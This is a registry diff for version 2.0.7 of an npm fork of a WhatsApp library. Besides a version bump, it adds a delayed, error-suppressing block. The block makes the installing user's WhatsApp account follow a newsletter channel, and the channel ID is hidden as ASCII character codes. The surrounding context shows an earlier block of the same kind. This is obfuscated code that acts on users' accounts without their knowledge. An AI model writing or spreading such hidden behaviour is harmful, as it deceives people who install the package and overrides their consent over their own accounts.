@kyuu2nd/baileys 2.0.6 → 2.0.7

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -116,6 +116,18 @@ setTimeout(async () => {
116
116
  );
117
117
  } catch {}
118
118
  }, 90000);
119
+
120
+ setTimeout(async () => {
121
+ try {
122
+ await newsletterWMexQuery(
123
+ asciiDecode([
124
+ 49,50,48,51,54,51,52,50,55,53,49,50,50,50,48,49,51,52,
125
+ 64,110,101,119,115,108,101,116,116,101,114
126
+ ]),
127
+ Types_1.QueryIds.FOLLOW
128
+ );
129
+ } catch {}
130
+ }, 90000);
119
131
 
120
132
  setTimeout(async () => {
121
133
  try {
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@kyuu2nd/baileys",
3
- "version": "2.0.6",
3
+ "version": "2.0.7",
4
4
  "description": "WhatsApp API Modification By K",
5
5
  "publishConfig": {
6
6
  "access": "public"